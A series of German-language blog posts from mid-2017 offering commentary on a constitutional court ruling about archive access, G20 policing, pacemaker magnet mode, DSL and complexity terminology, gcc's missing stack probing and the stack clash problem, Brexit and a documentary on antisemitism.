Das Bundesarchiv und der Bundesbeauftragte für Medien hätten diesen Hinweis geben müssen aber unterlassen. Ich habe geklagt gegen die Bundesrepublik, vertreten durch das Bundesarchiv, aber die Klage ging gegen die Regierung insgesamt.Ich frage mich, warum meine Verfassungsbeschwerde überhaupt angenommen worden ist, wenn sie jetzt mit einer Null-Inhaltlichen Begründung verworfen wurde. Ich vermute, dass am Ende die Verfassungsrichter sich dem politischen Druck gebeugt haben. Ich kenne das aus südamerikanischen Bananenrepubliken, in Argentinien nennen sie das „gobernabilidad“ – wenn das Recht zurücktreten muss, weil die Politiker (und die Wirtschaftsführer) den Souverän, das Volk, die Wähler, weiter belügen und von Entscheidungsprozessen ausschließen wollen. Es ist das Gegenteil eines Rechtstaats. Ich werde jetzt mit meinem Anwalt, Raphael Thomas, die Sache beraten und sehen, wie wir weiter machen. Evtl. gehen wir nach Straßburg. Darüber informiere ich demnächst.
Ich bin ehrlich gesagt entsetzt, dass das Verfassungsgericht hier nicht klar Tisch gemacht hat. Wollen die wirklich auf der Seite der Geschichtsbücher landen am Ende?! Ist mir völlig unklar, was hier passiert ist. Das Money Quote aus dem Urteil ist leider das hier:
Insbesondere erstreckt sich der Informationszugangsanspruch von vornherein nicht auf Dokumente, die eine informationspflichtige Stelle für die Erfüllung ihrer Aufgaben zwar beschaffen könnte oder auch müsste, sich aber nicht beschafft hat.
Ja, da kann man dann halt nichts machen!1!!
Sehr schade und sehr beunruhigend.
Die argumentieren da an einer Stelle ernsthaft, na wenn der Gesetzgeber da keinen funktionierenden Klageweg explizit vorgesehen hat, dann wollten sie wohl auch nicht, dass man da als Bürger klagen kann. Ich bin sprachlos.

Sun Jul 9 2017

[l] Die Berliner Zeitung kommentiert G20:
Und dazu passt auch keine Polizeiführung, die ohne jedes Verständnis für die Un-Verhältnismäßigkeit ihrer Mittel agiert. Würde am 1. Mai in Berlin so gehandelt wie beim G20-Gipfel, sähe es in Kreuzberg nicht anders aus als jetzt auf der Schanze.
Und als kleines Kontrastprogramm: Olaf Scholz feiert den "heldenhaften Einsatz" der Polizei.
Er weise jede Kritik an der Polizei mit großer Entschiedenheit zurück. „Die haben alles richtig gemacht und einen heldenhaften Einsatz zustande gebracht.“

Sat Jul 8 2017

[l] Erdogan hat ja internationale Erpressung zum Geschäftsmodell der Türkei gemacht. Trump hat ihm auf dem G20-Gipfel einen neuen Hebel gezeigt: Den Klimagipfel.

Thu Jul 6 2017

[l] Zu der Implantatfrage schreibt ein Leser:
Ich hatte im Nebenfach Medizin mal eine Prüfung für Informatiker gemacht und war damals auch sehr amüsiert das zu lesen:
Zumindest bei Herzschrittmachern ist der Running Gag mit dem mit kollabierenden Leuten, wenn Sie durch ein Magnetfeld laufen, gewollt! Herzschrittmacher haben ALLE einen Magnetmodus (->Wikipedia) mit denen sie in einen Notfallmodus versetzt werden, wenn man dem Patienten einen Dauermagneten auf die Brust legt. Der Notfallmodus sieht so aus, dass der Herzschittmacher dann starrfrequent 60-70 Schläge/Minute macht und Eigenaktionen des Herzens ignoriert. Damit bekommt man einen Patienten bei Komplikationen noch lebend in ein Krankenhaus. Das funktioniert weltweit und man muß "nur" einen Magneten finden. Der Patient fühlt sich natürlich dabei nicht sehr wohl, aber das zählt dann nicht.
Ich kann mir gut vorstellen, dass dies auch bei Implantaten im Gehirn ein gewollter Effekt ist. Z.B. wenn jemand kollabiert am Boden liegen sollte, weil sein Implantat Mist dedektiert hat und falsche Aktionen auslöst. Magnet drauf und den Patienten mit harmlosen Pakinsonzittern zum Nachsehen in ein Krankenhaus schaffen.

Wed Jul 5 2017

[l] Akt 1: Trump postet ein Meme-GIF.
Akt 2: Es kam von /r/the_donald (Brutkasten der Alt Right)
Akt 3: CNN findet heraus, wer der Poster ist, kontaktiert ihn.
Daraufhin löscht der schnell alle seine Postings, postet eine lange Entschuldigung und bestätigt CNN, dass er das ist. CNN schreibt dann noch ominös, sie behielten sich ein Doxxing vor.
Die Ausrede ist natürlich, wie immer, "ich wollte doch nur spielen".
Update: Weil es da einige indignierte Kommentare per Mail gab, ein paar Anmerkungen. Erstens: Dass CNN sich da als Opfer von Gewaltaufrufen im Internet hinzustellen versucht, das hat mich auch geärgert, aber das kann man leider nicht CNN vorwerfen, das machen ja im Moment alle Medien so. Und in dem Klima, das Trump mit seinen Fake News-Vorwürfen erzeugt, bin ich mir nicht sicher, ob das irgendjemand von uns anders machen würde an deren Stelle. Klar sehen die sich als Opfer. Und ihre Leser sehen sie auch als Opfer. Pro-Trump-Stimmen sind in den Umfragen mittlerweile klar in der Minderheit in den USA, das heißt mit dem "wir sind hier alle Opfer von Trump"-Gerede versuchen die, eine Gemeinsamkeit mit ihren potentiellen Käufern zu schaffen.
Dass CNN da Doxxing androht und dann "gnädigerweise" nicht tut, weil der Mann ja Reue zeigt, das ist aus Europäischer Sicht grotesk, ja. Aber in den USA sehen die Regelungen für Namensnennungen deutlich anders aus als bei uns. Da stehen schon mal vom Sherriff Mugshots aller Verhafteten im Internet, mit Namen dran. In Zeitungsartikeln über Verbrechen werden Namen genannt, selbst (gerade!) wenn es sich um Prominente handelt. Das ist da völlig normal. Eine Ausprägung der "selbst schuld"-Mentalität, mit der die Amis ja auch andere Dinge betrachten, beispielsweise "wer keinen Job hat, ist selbst Schuld" oder sogar "wer krank wird, ist selbst Schuld". Insofern ist das aus Sicht von CNN USA tatsächlich gnädig und geradezu europäisch, dass sie den Namen des Mannes nicht öffentlich gemacht haben.

Sat Jul 1 2017

[l] Auf Netflix gibt es gerade Nobody Speak zu gucken, ein Dokumentarfilm, der sich aus Sicht von Gawker mit dem Hulk-Hogan-Gerichtsverfahren beschäftigt.
Ich habe hier im Blog auch über das Thema berichtet und meine Einstellung war im Wesentlichen, dass Gawker mit ihrem Gossenjournalismus das verdient hat.
Der Film lässt mich jetzt ein paar Dinge nochmal neu bewerten.
U.a. schildern sie, wie Hulk Hogan vor Gericht eine Litanei aus Klagepunkten und Schadensersatzforderungen hat, wie es üblich ist, um am Ende möglichst viele davon zugesprochen zu kriegen. Und dann, als im Grunde klar ist, dass er gleich gewinnen wird, zieht er einen davon zurück. Seelischen Stress. Ein Punkt, von dem klar war, dass er den zugesprochen kriegen würde, und der bei weitem nicht der Extremste auf der Liste war.
Auflösung: Mit diesem Punkt hätte bei Gawker die Versicherung gezahlt. Ohne diesen Punkt greift der Rest der Forderungen direkt auf den Chefredakteur und den Gründer durch.
Peter Thiel, der das Verfahren für Hogan finanziert hat, war eben nicht daran gelegen, möglichst viel Geld zu erstreiten, sondern der wollte den Chefredakteur und den Gründer persönlich plattmachen. Das ist schon krass.
Ein weiterer Fall, der in dem Film behandelt wird, ist der vom Las Vegas Review-Journal. Der Casino-Milliardär Sheldon Adelson hat sich über die Berichterstattung von denen über sich geärgert und schlicht den Laden gekauft und die Nacht der langen Messer unter den Journalisten gemacht.
Die Implikationen sind schon sehr krass, das bringt der Film gut rüber. Kann ich weiterempfehlen.

Thu Jun 29 2017

[l] Erinnert ihr euch an diesen Spendenaufruf für Gaby Weber? Bei Spendenaufrufen ist ja immer wichtig, dass man berichtet, was aus der Kohle geworden ist. Hier gab es einen kleinen Zwischenstand.
Ich habe mich letzte Woche nochmal mit Gaby getroffen und mir ein paar Notizen gemacht, was sich so in der Zwischenzeit ereignet hat.
Eines der Hauptkonfliktgebiete ist ja, dass viele Kanzler und Minister nach ihrer Zeit ihre Akten nicht wie gesetzlich gefordert dem Bundesarchiv geben, sondern die entweder bei sich zuhause lagern, oder wenn sie inzwischen gestorben sind, dann lagern die beim Nachlassverwalter oder der Familie, oder, auch sehr häufig, sie lagern bei den "parteinahen Stiftungen" (Adenauer-Stiftung, Naumann-Stiftung, etc, übrigens mit Steuermitteln finanziert!). Im Bundesarchiv kann man Einblick nehmenn, bei diesen Stiftungen nicht. Das ist für Gaby Weber und alle anderen ordentlichen Journalisten völlig inakzeptabel, aber irgendwie ist Gaby Weber die Einzige, die da mal richtig Drohkulissen aufgefahren hat. Konkret ging es um die Genscher-Akten. Das Auswärtige Amt hatte wohl keine, das Bundesarchiv auch nicht, und Gaby hat dann (nicht zuletzt dank eurer Spenden) genug Drohkulisse aufbauen können, dass sie einen ordentlichen anwaltlichen Brief geschrieben hat, der so durchargumentiert war, dass klar war, dass der auch direkt vor Gericht als Anklage oder Urteilsbegründung dienen könnte. Daraufhin sind die eingeknickt und völlig überraschend haben sich einen Tag vor Ablauf der Frist, die Gaby gesetzt hatte, 26 Umzugskartons mit Handakten materialisiert. Nun heißt das nicht, dass die sofort alle zur allgemeinen Verfügung stehen. Auf einigen Inhalten wird noch eine Sperrfrist liegen (30 Jahre sind da Standard), aber jetzt kann auf Fallbasis Einblick beantragt werden, und der Gerichtsweg steht offen. Ein großer Sieg für die Demokratie und den Journalismus, wenn ich mich fragt. Dank eurer Spenden!
Gaby erzählte, dass die Fronten ganz lustig sind, weil das Bundesarchiv und das Auswärtige Amt natürlich auch eigentlich die sein wollen, die die Akten haben, und die eigentlich schon längst hätten haben sollen, aber die haben sich nicht getraut, da ihre Parteifreunde und Kollegen zu verärgern und richtig Druck zu machen, da brauchte es externen Druck durch Gaby.
Das nächste Ergebnis eurer Spenden ist, dass Gaby jetzt den Mossad auf Akteneinsicht in der Eichmann-Sache verklagt. Ja, den Mossad. In Israel. Den Geheimdienst. Man würde denken, dass das aussichtslos ist, aber den ersten Achtungserfolg hat sie schon erreicht: Der Mossad hat seit vielen Jahren Eichmann auf ihrer Homepage gehabt, weil das ja sozusagen ihr Gründungsmythos ist. Aber jetzt seit kurzem, seit Gabys Schreiben da eingegangen ist, ist da kein Eichmann mehr. Und Gaby meinte, auch die Suchmaschine spuckt plötzlich kein Eichmann mehr aus.
Gabys Theorie dazu ist, dass der Mossad tatsächlich keine Akten zu Eichmann hat, weil sie genau wie alle anderen überrascht wurden, als der angeblich von ihnen entführte Eichmann plötzlich in Israel aus dem Flugzeug kam. Aber das lässt sich ja klären, wenn die Akten endlich einsehbar sind :-)
Gaby erzählte, dass es wohl vergleichsweise schwierig ist, in Israel Anwälte zu finden, die in dieser Sache gegen den Mossad klagen wollen. Aber am Ende hat sie doch jemanden gefunden. Mal gucken, wie sich das entwickelt.
Und weil der Mossad noch nicht krass genug ist als Endboss, verklagt Gaby auch gleich noch die russischen Verteidigungs- und Außenministerien auf Aktenherausgabe. Wieder in der Causa Eichmann. Das Verteidigungsministerium, weil denen der Auslandsgeheimdienst GRU unterstellt ist. Popcorn!!
Ja und dann steht da in den nächsten Tagen ein Urteil des Bundesverfassungsgerichtes an:
Verfassungsbeschwerde gegen verwaltungsgerichtliche Entscheidungen gegen die Bundesrepublik Deutschland als Träger des Bundesarchivs, die die Versagung der Bereitstellung von Akten zur Einsichtnahme betreffen.
Dieses Verfahren hat jetzt durch den Tod von Helmut Kohl eine besondere Brisanz und Dringlichkeit erhalten. Das sieht auch das Bundesverfassungsgericht so und hat dem Vernehmen nach die Entscheidung vorgezogen — die war eigentlich erst Ende des Jahres geplant. Ich deute das als gutes Omen und bin sehr gespannt.
Wenn ihr gespendet habt, dann: Herzlichen Dank! Wenn nicht, dann könnt ihr es euch ja jetzt nochmal überlegen :-)

Tue Jun 27 2017

[l] Aus der beliebten Reihe "Fremdwörter lernen mit Fefe", heute: asymmetrisch, asynchron, asymptotisch.
Asymmetrisch ist, wenn links und rechts (oder oben und unten oder entlang einer beliebigen Spiegelachse) unterschiedliche Muster sind. Dem Einsender ging es um DSL, daher sollte ich vielleicht erstmal erklären, was DSL ist. DSL steht für Digital Subscriber Line, und meint die digitale Übertragung von Daten über eine gammelige alte schlecht ~~isolierte~~ abgeschirmte Kupferleitung (hier als "Subscriber Line" bezeichnet). Über die hat man früher Signale analog übertragen (grob: man legt links eine Kurve an und rechts kommt eine mehr oder weniger ähnliche Kurve raus). Das Problem mit analogen Signalen ist, dass die Übertragungsqualität von Signalen von Faktoren wie der Reinheit des Materials und der Kabellänge abhängt, und von der Isolierung, bei Lichtwellenleitern sogar von der Krümmung des Kabels. Daher die Idee, das Signal sehr regelmäßig zu machen (es gibt nur "hoch" und "tief", und auch wenn das Signal stark verzerrt wird, kann man die immer noch gut unterscheiden).
Das ergibt aber das nächste Problem, nämlich das der Taktung. Man muss sich auf eine gemeinsame Taktung einigen, sowas wie 300 Hertz. 300 Mal pro Sekunde guckt man, was gerade für ein Signal ankommt, und ob das gerade "hoch" oder "tief" ist. Dann hat man eine Übertragungsrate von 300 Baud, und das war eine übliche Übertragungsrate bei Akustikkopplern und frühen Modems. Mein erstes Modem konnte 2400 Baud.
Seit dem hat sich natürlich viel getan. Statt nur zwei Zuständen machte man mehr, man drehte den Takt hoch, und man benutzte Datenkompression und Prüfsummen. Wer sich fragt, wie man den Takt synchronisiert zwischen zwei Geräten: Da gibt es faszinierende Tricks.
Der Punkt war aber: DSL ist Digital. Nun hat man einen bestimmten Frequenzbereich auf so einem Kupfelkabel, bei dem man sich darauf verlassen kann, dass grob das gleiche ankommt, das abgeschickt wurde. Den kann man jetzt brüderlich aufteilen in "für Senden" und "für Empfangen". Das nennt sich dann SDSL (für symmetrisches DSL). Es stellt sich aber raus, dass typische Web-Klick-Endanwender viel mehr empfangen als sie senden. Alles, was die so senden, sind ein paar Bytes für HTTP-Anfragen und ein paar Bytes für TCP-Bestätigungen (das kann ich ja ein anderes Mal erklären). Wenn man das 50-50 aufteilt, dann verschwendet man den Großteil der Bandbreite. Also hat man sich bei DSL für Konsumenten überlegt, dass man einfach 90% der Bandbreite für Empfangen und 10% für Senden nimmt. Das ist nicht symmetrisch, daher heißt es asymmetrisch — ADSL.
Synchron kommt aus dem griechischen und heißt "gemeinsame Zeit". Das hat viele Bedeutungen, je nach Fachbereich. Bei Servern und Protokollen kann es heißen, dass die Uhrzeit der Teilnehmer gleich ist. In der Physik kann es heißen, dass beide Seiten mit der gleichen Frequenz schwingen. In der Softwareentwicklung kann es heißen, dass ein API wartet, bis das Ergebnis da ist. Jemanden auf dem Telefon anrufen ist synchron. Es klingelt, und man wartet, bis jemand dran geht oder man abbricht. Eine SMS ist asynchron. Man schickt sie ab, und irgendwann später erhält man eine Versandbestätigung und/oder Antwort oder auch nicht. Im Umgang mit Hardware ist asynchrone Programmierung immer viel effizienter als synchrone. Einer Festplatte zum Beispiel sagt man: Hier sind die Daten, da will ich die hingeschrieben haben, und dann tut man andere Dinge, die gerade anliegen. Später kriegt man dann mitgeteilt, dass die Platte das geschrieben hat (oder ein Fehler auftrat). Netzwerkkarten funktionieren genau so. Das ist sogar so wichtig für die Effizienz, dass auch das Übertragen des Kommandos schon asynchron gemacht wird. Das Betriebssystem sagt der Festplatte nicht die Daten, sondern wo die Daten im RAM liegen, und die Festplatte (ich vereinfache jetzt unzulässig) holt sich die Daten dann von dort, während das System andere Dinge tut. Der Mechanismus dafür heißt DMA (Direct Memory Access).
Asymptotisch ist ein Begriff aus der Mathematik, der heißt, dass sich eine Funktion langfristig ("im Unendlichen") einer anderen Funktion annähert. In der Informatik spielt das eine Rolle, wenn man über die Performance von Verfahren redet. Dann versucht man, Algorithmen in Klassen einzuteilen, aus denen man grob erkennen kann, ob sie sich nur für kleine Datenmengen eignen oder auch für große. Dafür guckt man sich an, wie sich die Laufzeit des Verfahrens verändert, je größer die Eingabe ist. Die Kategorien gehen dann von "konstante Laufzeit, egal wie viel Input kommt" über "doppelt so viel Input — doppelt so lange Laufzeit" bis hin zu exponentiell wachsenden Laufzeiten (oder gar Verfahren, die möglicherweise nie fertig werden). Die Laufzeit, die man hier betrachtet, ist die asymptotische Laufzeit. Ein Beispiel für ein Verfahren konstanter Laufzeit wäre "in die Tüte greifen und ein Stück rausholen". Ein Beispiel für ein Verfahren linearer Laufzeit wäre "das kleinste Element aus einer Liste raussuchen". Wenn die Liste sortiert ist, kann man es in konstanter Zeit machen (einfach das erste greifen).
Update: Übrigens gab es früher bei Modems einen Trick, denn man auch mal bei DSL einführen sollte: Die konnten umschalten. Wenn man gerade mehr senden als empfangen wollte, hat das Modem umgeschaltet und 90% der Bandbreite für das Senden genommen. Wenn man gerade mehr empfangen als senden wollte, hat das Modem umgeschaltet und 90% der Bandbreite für das Empfangen genommen. Das hieß damals HST Modus und war der Grund, wieso jahrelang fast alle in der Mailboxszene Modems von US Robotics gekauft haben.
Update: DSL hat natürlich noch mehr Tricks als Modems, um so hohe Übertragungsraten zu erreichen. Beispielsweise haben ADSL2+ und VDSL mehr als einen Träger.
Update: Ob mein Modem wirklich 2400 Baud hatte, oder nur (viel wahrscheinlicher) 1200 oder gar 300 Baud aber 2400 bps, das lässt sich leider nicht mehr prüfen, denn ich habe es nicht mehr. bps ist die Anzahl der Bits pro Sekunde, Baud ist die Anzahl der Symbole pro Sekunde; Man kann pro Symbol auch mehr als ein Bit übertragen, und das taten so ab der Zeit an sich alle.
Update: Ein Einsender korinthenkackt:
Die mathematische Erklärung zur Symmetrie ist ein wenig unvollständig denn sie lässt Rotationssymmetrien aus, für die Übertragungstechnik meines Wissens nicht relevant aber trotzdem erwähnenswert wenn es um den Begriff geht.
Zu asymptotisch noch den Hinweis das es darum geht das sich die Funktion beliebig nah einseitig annähert diese aber nicht (oder nur in abzählbar vielen Punkten) berührt.

Sat Jun 24 2017

[l] Kurzes Internet-Hass-Update: Seit ein paar Jahren tobt da draußen ein Krieg zwischen … ja, da fängt es schon an. Die eine Partei sagt, es sind "Sascha Pallenberg vs. die Femtrolle", die andere Partei sagt, es sind "ich und die fiesen Harrasser, die mich stalken". Die Vorgeschichte ist hier von der einen Partei aufgeschrieben worden.
Nachdem es da nach Jahren immer noch Hetze gab, z.B. in Form von öffentliche Shitstorm-Mob-Forderungen an eine Veranstaltungs-Orga, man dürfe diesem Typen keinesfalls ein Panel machen lassen, hat der jetzt mal eine Einstweilige Verfügung erwirkt (wenn ich das richtig verstehe, dann in dieser Sache und gegen lasersushi?). Und öffentlich angesagt, dass das darüber reinkommente Geld an Cap Anamur gespendet wird. Jetzt ist die Frage, ob es zu einem Hauptverfahren kommt, was ich mal nicht vermute, weil das Geld kostet und ein Risiko birgt, und weil es sich ja auch ganz gut damit fährt, diese juristische Keule jetzt als "die Harasser benutzen sogar Gerichte gegen mich"-Opferstory auszuschlachten. Wir sind ja hier nicht in England, wo in der gerichtlichen Knebel-Anordnung drinsteht, dass man nicht über die Knebel-Anordnung sprechen darf.
Ich sollte dazu sagen, dass ich in der Angelegenheit befangen bin, weil ich auch schon von dem Shitstorm-Mob beschimpft wurde, der dem Pallenberg da seit Jahren nachstellt. Weil ich es gewagt hatte, früher mal über diese Story zu bloggen. Damit hatte ich mich aus deren Sicht mit einem fiesen misogynen Masku-Stalker-Harrasser-Fastvergewaltiger gemein gemacht und gehörte bekämpft.
Update: Ich als juristischer Laie bin ein bisschen überrascht, dass er eine Einstweilige Verfügung gekriegt hat, denn das ist eigentlich ein Instrument zur Abwehr von wirklich dringendem Schaden, der bis zum Hauptverfahren nicht warten kann. Das bei einem seit drei Jahren laufenden Ding anzuwenden, geht meinem Verständnis nach gar nicht. Aber hey, vielleicht interpretiere ich das ja auch völlig falsch alles, denn er erwähnt ja den Namen auch gar nicht direkt, und hat die EV im Wortlaut nicht veröffentlicht.
Update: Juristisch stimmt da was noch nicht. Mir erklärt gerade eine befreundete Juristin, dass bei einstweiligen Verfügungen kein Geld an den Pallenberg fließen würde. Das ginge erst nach einem Hauptverfahren, das aber noch nicht eingeleitet wurde.
[l] Habt ihr euch auch so Sorgen gemacht?
Dass diese Regierung doch noch etwas positives hinkriegen könnte?
Konkret: Störerhaftung für WLANs abschaffen?
Die Sorgen waren unbegründet :-(

Fri Jun 23 2017

[l] Katars Nachbarstaaten haben einen Forderungskatalog übergeben. Unter anderem soll Al Jazeera zugemacht werden. Katar hat 10 Tage Zeit.

Thu Jun 22 2017

[l] D soll Teil von gcc werden.
D ist eine Programmiersprache, die sich als Konkurrent zu C++ sieht, und als Nachfolger von C. Die Featureliste klingt auch erst mal nicht schlecht, aber es hat mich persönlich nicht überzeugen können. C++ hat sich ja als Design-Richtlinie entschieden, nur Abstraktionen in der Sprache zu machen, die "nichts kosten", und in der Library im Standard vorzugeben, welche asymptotische Laufzeit die Algorithmen haben sollen. So kann man sich als Programmierer im Wesentlichen darauf verlassen, dass die Laufzeit vorhersagbar und deterministisch bleibt. Überraschungen gibt es jedenfalls nur selbstverschuldete :-)
Bei D ist genau das über Bord geworfen worden. Das Ziel war anscheinend, ein C++ zu kriegen, das sich mehr wie eine Skriptsprache anfühlt. Problem: An der Stelle kann D nicht mit Go mithalten. Und C++-Programmierer gewinnt es mit dem Ansatz auch nicht viele.
So hat D Garbage Collection, aber ohne die fanatischen Optimierungen des Go-Teams. D hat dynamische Strings und assoziative arrays, aber als Feature der Sprache, nicht des Runtimes. D nimmt die schlechten Ideen von C++ mit (Template Metaprogramming, Operator Overloading) aber nicht die Vorteile (deterministisches Laufzeitverhalten, zero-cost abstractions).
Ich hacke auf dem deterministischen Laufzeitverhalten so rum, weil das der Grund ist, wieso heute immer noch viele Realtime-Geschichten in C gemacht werden. Mit striktem Regelkorsett oben drüber, wie "keine Rekursionen" und so. Die Lösung von D? Sie behaupten einfach, man könne in D auch systemnah programmieren. Behaupten reicht nicht, liebe D-Leute.
Ich will D nicht schlechter machen als es ist. D hat auch gute Ideen. Design by Contract zum Beispiel, das "synchronized"-Keyword, … ist nicht alles schlecht. Und vielleicht wird D-Code ja mit dem Backend von gcc sogar schneller als Go-Code. Auf der anderen Seite hat auch Go ein gcc-Backend. Ich glaube, D ist von Go getötet worden, und gcc macht hier einen Fehler. gcc schleppt schon jetzt mehrere Frontends mit sich herum, die dann nicht ordentlich mitgepflegt werden. java, go, ada, und jetzt dann auch noch D. Und die Probleme im C-Teil bleiben dann liegen (beispielsweise das fehlende Stack Probing, das ich die Tage ansprach).
Update: Ich sollte das vielleicht knackiger formulieren. Die Vorteile, die D über C++ hat, rechtfertigen dem Umstieg nicht, weil man das zum Großteil auch in C++ haben kann, und dann verliert man nicht seine reingesteckte Erfahrung und den Zugriff auf die ganzen existierenden Libraries. Leute ohne C++-Ballast würden eh lieber gleich zu Go greifen. Und Leute, die die sichere Programmierung haben wollen, mit der D Werbung macht, können das bei Rust haben, ohne die undeterministischen Laufzeiten oder Abstraktionskosten schlucken zu müssen.

Wed Jun 21 2017

[l] Nachschlag zu dem Stack Probing: Die grsecurity-Leute haben einen länglichen, schwer erträglichen Rant dazu geschrieben, weil sie sich wie immer von allen anderen unterrespektiert fühlen. Aber technisch haben sie, ebenfalls wie immer, mal wieder völlig Recht.
Ein Einsender kommentiert außerdem:
Vielleicht wäre es noch gut zu erwähnen, das neben GCC auch clang nicht wirklich Unterstützung für Stack Probes hat… außer man benutzt es unter Windows, weil da Stack Probes anscheinend Teil der ABI sind. Siehe auch dieser schöne Rant.
Im Zusammenhang mit Rust gabs da in den letzten Tagen etwas Aufregung (Memory safe? Aber ihr habt doch unkontrollierte Stack Overflows!) und einer der Rust Entwickler hat einen Patch für clang gemacht (bzw. einen alten den niemand updaten wollte hoffentlich mergebar gemacht)
Mit etwas Glück ist das dann wohl zumindest in naher Zukunft mit clang kein Problem mehr.
Das wäre schön!

Tue Jun 20 2017

[l] Gerade geht ein schönes Paper rum, wie man eine Kollision zwischen Heap und Stack ausnutzen kann.
Dass das ein Problem ist, war schon immer klar. Der Heap wächst nach oben, der Stack nach unten, was wenn die sich treffen?
Das Problem ist so alt, dass früher die "Lösung" einfach war, zu sagen, naja, dann ist Speicher alle, und wenn Speicher alle ist, dann crashen die Programme ja auch ohne Kollision!1!!
Die besseren Programme haben dann irgendwann angefangen, Speicherknappheit zu erkennen und nicht zu crashen, und so gab es auch irgendwann eine halbherzige "Lösung" für das Kollisionsproblem — eine "Guard Page". Speicherschutz funktioniert über eine Hardware-Komponente namens MMU, Memory Management Unit, und die arbeitet nicht auf Bytes sondern auf Pages. Pages sind im Allgemeinen 4KiB groß. Wenn man auf eine Page zugreift, die nicht da ist, dann wirft der Prozessor eine Exception, die das Betriebssystem abfangen kann. So wird beispielsweise Swapping implementiert. Aber wenn der Zugriff auf eine Page war, die nicht da sein sollte, dann kriegt das laufende Programm einen Segmentation Violation signalisiert (theoretisch auch abfangbar, aber üblicherweise nicht abgefangen und prinzipiell auch keine so gute Idee) und crasht.
Die Idee der Guard Page ist, dass man zwischen dem Ende des Heaps und dem Anfang des Stacks eine Page leer und ungemappt lässt. Das klingt erstmal gut, ist es aber nicht.
Denn auf dem Stack kann man auch lokale Variablen deklarieren, die größer als eine Page sind, und so die Guard Page überspringen.
Nichts hiervon ist irgendwie überraschend oder eine neue Erkenntnis. Und die Lösung ist auch offensichtlich. Wenn der Compiler auf dem Stack etwas größer als eine Page alloziert, dann emittiert er eben auch Code, der alle Pages auf dem Weg einmal kurz anfasst.
Visual Studio tut das seit über 10 Jahren, wahrscheinlich schon viel länger. Seit ich mir das erste Mal deren Disassemblat angeguckt habe, tut es das.
gcc tut es aber nicht.
Ich erinnere mich noch, mich 2005/2006 mit meinem Kumpel Ilja über genau dieses Problem unterhalten zu haben, und ich bin mir fast sicher, dass er den gcc-Leuten gesagt hat, sie sollen da mal solchen Code emittieren. Aber er findet gerade kein verlinkbares Material. Dafür, dass gcc da seit 20 Jahren auf einem bekannten Problem sitzt, lege ich aber meine Hand ins Feuer. das war komplett vermeidbar, und die, die es hätten vermeiden müssen, haben es nicht getan. Ohne eine Ausrede dafür zu haben. Hier ist z.B. ein Beitrag von 2013, der das Problem beschreibt. Krasserweise gibt es sogar grundsätzlich Support für Stack Probing in gcc, der ist nur bei C und C++ nicht angeschaltet. Hier ist ein Bug von 2007 dazu. Ich bin mir aber sicher, dass das Problem schon länger bekannt ist.
[l] Neues Brexit-Ungemacht droht aus einer unerwarteten Ecke: Im Moment verhindern EU-Regularien, dass beispielsweise Italien Champagner verkaufen darf, oder umgekehrt die Briten nicht Thüringer Rostbratwürste. Und nur nach 30 Jahren Verhandlung haben die Briten es geschafft, dass sie ihre "Catbury's"-"Schokolade" in der EU als "Schokolade" vertreiben dürfen. Dafür mussten die EU-Definitionen aufgeweicht werden.
Nach Brexit könnte es also sein, dass fiese EU-Piraten in UK billige Imitate von Stilton oder Cornish Meat Pie auf den Markt werfen.
Die Sorge existiert natürlich auch in die andere Richtung.

Thu Jun 15 2017

[l] Ich habe mir den Antisemitismus-Film übrigens mal angeschaut und war nicht beeindruckt. Die Botschaft des Films ist im Wesentlichen, dass die Palästinenser alles fiese Terroristen sind. Der Film handelt aus meiner Sicht weniger von Antisemitismus als dass er ein Anklage gegen Palästinenser ist. Länglich werden dazu irgendwelche Hiphop-Videos von Exil-Palästinensern und anderen arabischstämmigen Musikern gezeigt, die krude Dinge behaupten. Schlimmer aber finde ich, dass es überhaupt nicht um Wahrheit geht, oder Fakten-Klären oder so. Wer behauptet, Israel zerstöre oder vergifte Brunnen in Palästina, der ist Antisemit. Es wird nicht mal der Versuch unternommen, zu prüfen, welchen Vorfall genau die gemeint haben und ob da möglicherweise was dran sein könnte. Nein, Brunnenkaputtmachen ist ein uraltes antisemitisches Märchen und wer das behauptet ist automatisch Antisemit. Dabei ist die Realität häufig komplexer als "der hat das getan" oder "der ist Schuld".
Der Film zeigt auch einige jüdische Kinder in Frankreich, die offenbar sehr ungünstig zwischen verschiedenen mehrheitlich arabisch besiedelten Banlieues wohnen, und da mehrfach Angriffen ausgesetzt waren. Das akzeptiere ich als gültigen Inhalt des Filmes, und wenn sie da mehr von gehabt hätten, und vielleicht noch versucht hätten, ein paar der angeklagten Araber darauf anzusprechen, dann wäre das besser gewesen. Aber so ging es nicht um Klärung von irgendwas oder Erkenntnisgewinn sondern um die Darstellung, dass das halt alles überall fiese Antisemiten sind, die die armen Juden plattmachen wollen.
Sehr schön auch eine Szene mit einer Professorin, die sie länglich ausführen lassen, Antisemiten würden heute ja nicht mehr das Wort "Juden" in den Mund nehmen. Sie sprächen beispielsweise nicht vom "internationalen jüdischen Finanzkapital" sondern nur noch vom "internationalen Finanzkapital" und würden ihrem Judenhass dadurch Ausdruck verleihen, dass sie jüdisch klingende Namen wie "Rothschild" oder "Goldman Sachs" nennen. Auch Israelkritik wird pauschal als Antisemitismus abgekanzelt. So etwas wie legitime Israelkritik gibt es nicht.
Fragen wie "wo kommt der eigentlich her" und "kann man mit Antisemiten reden und sie von ihrer Position abbringen" werden nicht gestellt. Die einzige Herkunftsanalyse, die mir auffiel, war, dass schlicht behauptet wurde, die Araber in Paris wären ja gar nicht per se antisemitisch, denen habe man (wer eigentlich?) aber eingetrichtert, sie müssten mit den Palästinensern solidarisieren, und die sind halt das Wurzel allen Übels. Im Übrigen, falls ihr das nicht wusstet: Die EU ist auch fies antisemitisch und fördert Hunderte von antisemitischen NGOs wie Amnesty International und Brot für die Welt in Palästina. Überhaupt fließt mehr Geld nach Palästina als in alle anderen Krisenherde der Welt. Die müssten eigentlich alles Millionäre sein, die Palästinenser, wenn die nicht so unmoralisch, verderbt und kriminell wären alle, und die Hilfsgelder (auch der Uno übrigens) absichtlich nicht in Reparaturen und Infrastruktur stecken würden, denn wenn man da Besserung sehen würde, dann könnten ja weitere Gelder wegbleiben.
Diese Vorwürfe gegen die Palästinenser kamen mir gegen Ende so absurd vor, dass ich mich an typische antisemitische Theorien erinnert fühlte, die den Juden ja ähnliches multi-level-Bösesein unterstellen.
Oh und natürlich darf kein Film über Antisemitismus vollständig sein, ohne die Protokolle der Weisen von Zion zu zitieren, und anzumerken, dass die Hamas das angeblich in ihrem Parteiprogramm zitiert (ist das so? LOL! Wie blöde sind DIE denn?!)
